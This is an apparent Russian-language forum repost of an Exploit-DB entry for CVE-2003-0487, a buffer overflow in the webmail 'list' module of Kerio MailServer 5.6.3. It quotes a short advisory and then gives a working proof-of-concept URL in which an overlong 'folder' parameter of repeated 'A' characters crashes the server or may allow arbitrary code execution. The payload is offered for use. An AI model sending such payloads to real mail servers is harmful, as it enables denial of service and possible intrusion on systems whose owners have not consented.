Exploit Kerio MailServer 5.6.3 list Module - Overflow

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
22802
Проверка EDB
  1. Пройдено
Автор
DAVID F.MADRID
Тип уязвимости
DOS
Платформа
LINUX
CVE
cve-2003-0487
Дата публикации
2003-06-18
Код:
source: https://www.securityfocus.com/bid/7967/info
  
Multiple buffer overrun vulnerabilities have been discovered in Kerio MailServer, which affect the webmail component. The problem occurs when handling usernames of excessive length and likely occurs due to insufficient bounds checking. Due to the similarity of these issues it has been conjectured that the root of the problem may be a single function used to handle all affected procedures.
  
Successful exploitation of this vulnerability could potentially result in the execution of arbitrary code, with the privileges of the Kerio MailServer process.

http://[Server]/list?folder=~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@localhost/INBOX
 
Источник
www.exploit-db.com

Похожие темы